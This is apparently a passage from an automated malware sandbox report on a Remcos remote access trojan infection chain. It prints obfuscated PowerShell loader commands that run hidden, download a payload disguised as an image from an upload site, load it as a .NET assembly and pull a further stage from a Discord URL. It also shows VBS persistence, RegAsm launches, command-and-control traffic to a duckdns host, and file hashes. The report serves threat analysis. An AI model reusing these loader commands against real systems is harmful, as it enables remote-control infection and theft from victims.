QNgdNPWgDJDsBJWOQNgdNPWgDJDsDWOQNgdNPWgDJDsWOQNgdNPWgDJDsTQBqWOQNgdNPWgDJDsFEWOQNgdNPWgDJDsMQBOWOQNgdNPWgDJDsFQWOQNgdNPWgDJDsWQWOQNgdNPWgDJDs1WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsHgWOQNgdNPWgDJDsTQBTWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsegBkWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsNQBsWOQNgdNPWgDJDsGIWOQNgdNPWgDJDsVwBoWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsWQBYWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBZWOQNgdNPWgDJDsFMWOQNgdNPWgDJDsOQB0WOQNgdNPWgDJDsGIWOQNgdNPWgDJDsMgBNWOQNgdNPWgDJDsHUWOQNgdNPWgDJDsYwBIWOQNgdNPWgDJDsEIWOQNgdNPWgDJDsaWOQNgdNPWgDJDsBaWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsSgB2WOQNgdNPWgDJDsFkWOQNgdNPWgDJDsMwBOWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsWgBDWOQNgdNPWgDJDsDUWOQNgdNPWgDJDsdQBaWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsTQB2WOQNgdNPWgDJDsEwWOQNgdNPWgDJDsegBwWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBIWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsPQWOQNgdNPWgDJDs9WOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZwBvWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsMwWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBDWOQNgdNPWgDJDsDoWOQNgdNPWgDJDscgBCWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsUWOQNgdNPWgDJDsByWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwByWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsbQBEWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsQgBBWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsbwBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZQWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDspWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsJwWOQNgdNPWgDJDspWOQNgdNPWgDJDsC4WOQNgdNPWgDJDsUgBlWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsTWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsGMWOQNgdNPWgDJDsRQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsJwWOQNgdNPWgDJDssWOQNgdNPWgDJDsFsWOQNgdNPWgDJDscwBUWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsaQBOWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsXQBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDszWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsuWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsZQBwWOQNgdNPWgDJDsEwWOQNgdNPWgDJDsQQBjWOQNgdNPWgDJDsEUWOQNgdNPWgDJDsKWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsLWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsHMWOQNgdNPWgDJDsVWOQNgdNPWgDJDsByWOQNgdNPWgDJDsGkWOQNgdNPWgDJDsTgBHWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsWwBDWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsQQByWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsMwWOQNgdNPWgDJDs2WOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBSWOQNgdNPWgDJDsGUWOQNgdNPWgDJDscWOQNgdNPWgDJDsBMWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsYwBFWOQNgdNPWgDJDsCgWOQNgdNPWgDJDsKWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDsxWOQNgdNPWgDJDsDEWOQNgdNPWgDJDsNWOQNgdNPWgDJDsWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNgWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNQWOQNgdNPWgDJDspWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsJwBcWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCkWOQNgdNPWgDJDs';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.97.2:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
Files
memory/2576-2-0x00000182CB590000-0x00000182CB5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h0uyqivb.rzv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2576-10-0x00007FF824110000-0x00007FF824BD1000-memory.dmp
memory/2576-12-0x00000182E3810000-0x00000182E3820000-memory.dmp
memory/2576-11-0x00000182E3810000-0x00000182E3820000-memory.dmp
memory/1668-22-0x00007FF824110000-0x00007FF824BD1000-memory.dmp
memory/1668-24-0x000002D8535A0000-0x000002D8535B0000-memory.dmp
memory/1668-23-0x000002D8535A0000-0x000002D8535B0000-memory.dmp
memory/1668-25-0x000002D8535A0000-0x000002D8535B0000-memory.dmp
memory/1668-26-0x000002D853560000-0x000002D85356A000-memory.dmp
memory/1284-28-0x00007FF824110000-0x00007FF824BD1000-memory.dmp
memory/1284-29-0x00000140DF320000-0x00000140DF330000-memory.dmp
memory/1284-30-0x00000140DF320000-0x00000140DF330000-memory.dmp
memory/1284-43-0x00007FF824110000-0x00007FF824BD1000-memory.dmp
memory/1668-44-0x000002D853D30000-0x000002D853D38000-memory.dmp
memory/1460-45-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 53ff085e18a63b8d5dd3d32a0a2bcd3a |
| SHA1 | f1a9ed121c550971ae08ed476e9123e3d45a349c |
| SHA256 | f348308a4428468e0ad80ec314331712e1257fa28787e22346a6f39a79de49d0 |
| SHA512 | 7a733c6ee62dd102b956641b7edee5b58cee26ee8a3e108f476103541e19f4928c95c145b3becc15d6b2ad62e2c521ef7e5c89d73daf838ad4bc74ca64dec965 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/1668-49-0x00007FF824110000-0x00007FF824BD1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
memory/2576-53-0x00007FF824110000-0x00007FF824BD1000-memory.dmp
memory/1460-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-56-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-59-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-61-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-66-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-67-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | 3903b463bfbd6088f4fdd5d7bfbc5245 |
| SHA1 | 5f008ac9081c2bbffc6311fa95e7e103888e8493 |
| SHA256 | cd95906a76e6ce07c6483854faa4f36c8e06a64d02ca9a72ee295d15a5edf709 |
| SHA512 | d2b8140dca1097a94f68fe921d07d57167c2fc346b656a0fc607ce035d0cec421f2045329bd59e7ad4e5f2c09feebe48a165e65d7c9aaab39c50552f615b41b8 |
memory/1460-73-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-74-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-79-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-80-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-87-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1460-100-0x0000000000400000-0x0000000000482000-memory.dmp